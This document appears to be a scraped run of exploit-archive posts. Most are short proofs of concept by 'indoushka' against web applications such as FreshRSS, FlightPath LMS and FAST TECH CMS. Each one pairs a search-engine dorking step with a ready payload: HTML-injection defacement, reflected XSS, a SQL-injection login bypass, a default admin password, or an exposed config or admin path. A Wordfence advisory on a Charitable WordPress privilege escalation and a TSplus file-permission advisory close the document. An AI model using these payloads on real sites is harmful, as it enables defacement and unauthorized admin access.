<pre><code>====================================================================================================================================<br />| # Title : FreshRSS v1.11.1 Html Inject Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://freshrss.org/ |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] https://demo127.0.0.1/freshrssorg/i/?c=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Forum Fire Soft Board v0.3.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://github.com/FSB |<br />| # Dork : Forum Fire-Soft-Board © 2004 - 2014 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : index.php?direction=DESC&g_id=2&like=begin%22%20%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%3d%22&limit=30&module=2&order=u_total_post&p=userlist&page=1&search_user=<br /><br />[+] http://target_site/index.php?direction=DESC&g_id=2&like=begin%22%20%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%3d%22&limit=30&module=2&order=u_total_post&p=userlist&page=1&search_user=<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Forma lms v1.4 Database Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.formalms.org/ |<br />| # Dork : Copyright (c) forma.lms Powered by forma.lms CE |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Allow visitors to download the configuration file but without the database information.<br /><br />[+] http://127.0.0.1/icsgboscotarantogovit/forma/install/download_conf.php<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Foodiee CMS v1.0.1 Insecure Direct Object Reference Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit) |<br />| # Vendor : https://foodie.com.np/ |<br />| # Dork : "restaurants_details.php?id=" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference Allows full control of the website.<br /><br />[+] Use payload : /admin/dashboard.php<br /><br />[+] http://127.0.0.1/wwwmaulikbazarcom/admin/dashboard.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Foodiee - Online Food Ordering Web Application V1.0.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/foodiee-restaurant-web-application/23335754?s_rank=57 | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] appears to leave a default administrative account in place post installation.<br /><br />[+] Use Backdoor Account : Username – admin@foodiee.com<br /><br /> Password – 123456 <br /> <br />[+] Panel : http://127.0.0.1/themeforestkamleshyadavnet/script/foodiee/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : FlightPath LMS v4.8.2 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |<br />| # Vendor : http://getflightpath.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=<--`<script>alert(/indoushka/);</script>``> --!><br /><br />[+] https://127.0.0.1/webservicesulmedu/flightpath/tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : FixBook - Repair Shop Management Tool v3.0 Password Hash Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://codecanyon.net/item/fixbook-repair-shop-management-tool/12333567 |<br />| # Dork : R.I.P |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Open the source code of the page<br /><br />[+] Go 2 line 49 found pass of databass encrypted . view-source:http://target_site/repair/update/<br /><br />[+] Here Update admin information : http://127.0.0.1/repair/update/<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : FAST TECH CMS v1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit) |<br />| # Vendor : http://www.p30vel.ir/ |<br />| # Dork : Designed & Developed by FAST TECH TECHNOLOGIES SERVICES PVT LTD . All rights reserved. |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : User & Pass = 1' or 1=1 -- -<br /><br />[+] https://127.0.0.1/repairthikanacom/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>Description: Donation Forms by Charitable <= 1.7.0.12 – Unauthenticated Privilege Escalation <br /><br />Affected Plugin: Charitable – Donations Plugin & Fundraising Platform for WordPress<br /><br />Plugin Slug: charitable<br /><br />Affected Versions: <= 1.7.0.12<br /><br />CVE ID: CVE-2023-4404<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Lana Codes <br /><br />Fully Patched Version: 1.7.0.13<br /><br />The Charitable plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.7.0.12 due to insufficient restriction on the ‘update_core_user’ function. This makes it possible for unauthenticated attackers to specify their user role by supplying the ‘role’ parameter during a registration.<br /><br />Technical Analysis<br /><br />Charitable is a plugin that makes it possible to create donation forms and fundraising campaigns in WordPress.<br /><br />The plugin provides a shortcode ([charitable_registration]) for a custom registration form. However, insecure implementation of the plugin’s registration functionality allows users to specify arbitrary parameters when creating an account. Examining the code reveals that there is no predefined list of user parameters, nor a ban list of dangerous parameters. This makes it possible to register an administrator user by supplying the ‘role’ parameter, with the value of the role they would like assigned to their account, such as ‘administrator’.<br /><br />[VIEW THIS CODE SNIPPET ON THE BLOG] <br /><br />The update_core_user method in the Charitable_User class<br /><br />As with any Privilege Escalation vulnerability, this can be used for complete site compromise. Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modifying posts and pages which can be leveraged to redirect site users to other malicious sites.<br /><br />Disclosure Timeline<br /><br />August 10, 2023 – Discovery of the Privilege Escalation vulnerability in Charitable.<br /><br />August 10, 2023 – We tried to initiate contact with the plugin vendor via email asking that they confirm the inbox for handling the discussion.<br /><br />August 10, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.<br /><br />August 16, 2023 – Since we didn’t get a response to the email contact, we tried to contact the plugin vendor via contact form asking that they confirm the inbox for handling the discussion.<br /><br />August 16, 2023 – The vendor confirms the inbox for handling the discussion.<br /><br />August 16, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.<br /><br />August 17, 2023 – A fully patched version of the plugin, 1.7.0.13, is released.<br /><br />September 9, 2023 – Wordfence Free users receive the same protection.<br /><br />Conclusion<br /><br />In this blog post, we detailed a Privilege Escalation vulnerability within the Charitable plugin affecting versions 1.7.0.12 and earlier. This vulnerability allows unauthenticated threat actors to elevate their privileges to those of a site administrator which could ultimately lead to complete site compromise. The vulnerability has been fully addressed in version 1.7.0.13 of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of Charitable.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on August 10, 2023. Sites still using the free version of Wordfence will receive the same protection on September 9, 2023.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /></code></pre>
<pre><code># Exploit Title: TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions<br /># Date: 2023-08-09<br /># Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia<br /># Vendor Homepage: https://tsplus.net/<br /># Version: Up to 16.0.2.14<br /># Tested on: Windows<br /># CVE : CVE-2023-31067<br /><br />TSplus Remote Access (v. 16.0.2.14) is an alternative to Citrix and <br />Microsoft RDS for remote desktop access and Windows application <br />delivery. Web-enable your legacy apps, create SaaS solutions or remotely <br />access your centralized corporate tools and files.<br />The TSplus Remote Access solution comes with an embedded web server to <br />allow remote users to easely connect remotely.<br />However, insecure file and folder permissions are set and this could <br />allow a malicious user to manipulate file content (e.g.: changing the <br />code of html pages or js scripts) or change legitimate files (e.g. <br />Setup-VirtualPrinter-Client.exe) in order to compromise a system or to <br />gain elevated privileges.<br /><br />This is the list of insecure files and folders with their respective <br />permissions:<br />Everyone:(OI)(CF)(F) and Everyone(F)<br />Permission: Everyone:(OI)(CI)(F)<br /><br />C:\Program Files (x86)\TSplus\Clients\www<br />C:\Program Files (x86)\TSplus\Clients\www\addons<br />C:\Program Files (x86)\TSplus\Clients\www\ConnectionClient<br />C:\Program Files (x86)\TSplus\Clients\www\downloads<br />C:\Program Files (x86)\TSplus\Clients\www\prints<br />C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient<br />C:\Program Files (x86)\TSplus\Clients\www\software<br />C:\Program Files (x86)\TSplus\Clients\www\var<br />C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp<br />C:\Program Files (x86)\TSplus\Clients\www\downloads\shared<br />C:\Program Files (x86)\TSplus\Clients\www\software\java<br />C:\Program Files (x86)\TSplus\Clients\www\software\js<br />C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres<br />C:\Program Files (x86)\TSplus\Clients\www\software\html5\locales<br />C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\topmenu<br />C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\key\parts<br />C:\Program Files (x86)\TSplus\Clients\www\software\java\img<br />C:\Program Files (x86)\TSplus\Clients\www\software\java\third<br />C:\Program Files (x86)\TSplus\Clients\www\software\java\img\cp<br />C:\Program Files (x86)\TSplus\Clients\www\software\java\img\srv<br />C:\Program Files (x86)\TSplus\Clients\www\software\java\third\images<br />C:\Program Files (x86)\TSplus\Clients\www\software\java\third\js<br />C:\Program Files <br />(x86)\TSplus\Clients\www\software\java\third\images\bramus<br />C:\Program Files <br />(x86)\TSplus\Clients\www\software\java\third\js\prototype<br />C:\Program Files (x86)\TSplus\Clients\www\var\log<br />C:\Program Files (x86)\TSplus\UserDesktop\themes<br />C:\Program Files (x86)\TSplus\UserDesktop\themes\BlueBar<br />C:\Program Files (x86)\TSplus\UserDesktop\themes\Default<br />C:\Program Files (x86)\TSplus\UserDesktop\themes\GreyBar<br />C:\Program Files (x86)\TSplus\UserDesktop\themes\Logon<br />C:\Program Files (x86)\TSplus\UserDesktop\themes\MenuOnTop<br />C:\Program Files (x86)\TSplus\UserDesktop\themes\Seamless<br />C:\Program Files (x86)\TSplus\UserDesktop\themes\ThinClient<br />C:\Program Files (x86)\TSplus\UserDesktop\themes\Vista<br /><br />------------------------------------------------------------------------------<br /><br />Permission: Everyone:(F)<br /><br />C:\Program Files (x86)\TSplus\Clients\www\all.min.css<br />C:\Program Files (x86)\TSplus\Clients\www\custom.css<br />C:\Program Files (x86)\TSplus\Clients\www\popins.css<br />C:\Program Files (x86)\TSplus\Clients\www\robots.txt<br />C:\Program Files <br />(x86)\TSplus\Clients\www\addons\Setup-VirtualPrinter-Client.exe<br />C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\hb.exe.config<br />C:\Program Files <br />(x86)\TSplus\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config<br />C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp\index.html<br />C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient\index.html<br />C:\Program Files (x86)\TSplus\Clients\www\software\common.css<br />C:\Program Files <br />(x86)\TSplus\Clients\www\software\html5\jwres\jwwebsockify.jar<br />C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres\web.jar<br />C:\Program Files <br />(x86)\TSplus\Clients\www\software\html5\own\exitlist.html<br />C:\Program Files <br />(x86)\TSplus\Clients\www\software\html5\own\exitupload.html<br />C:\Program Files <br />(x86)\TSplus\Clients\www\software\html5\own\getlist.html<br />C:\Program Files <br />(x86)\TSplus\Clients\www\software\html5\own\getupload.html<br />C:\Program Files <br />(x86)\TSplus\Clients\www\software\html5\own\postupload.html<br />C:\Program Files <br />(x86)\TSplus\Clients\www\software\html5\own\uploaderr.html<br />C:\Program Files (x86)\TSplus\Clients\www\software\java\index.html<br />C:\Program Files (x86)\TSplus\Clients\www\software\java\img\index.html<br />C:\Program Files (x86)\TSplus\Clients\www\software\java\img\port.bin<br />C:\Program Files (x86)\TSplus\Clients\www\software\java\third\jws.js<br />C:\Program Files (x86)\TSplus\Clients\www\software\java\third\sha256.js<br />C:\Program Files <br />(x86)\TSplus\Clients\www\software\java\third\js\prototype\prototype.js<br />C:\Program Files (x86)\TSplus\Clients\www\software\js\jquery.min.js<br /><br /><br /></code></pre>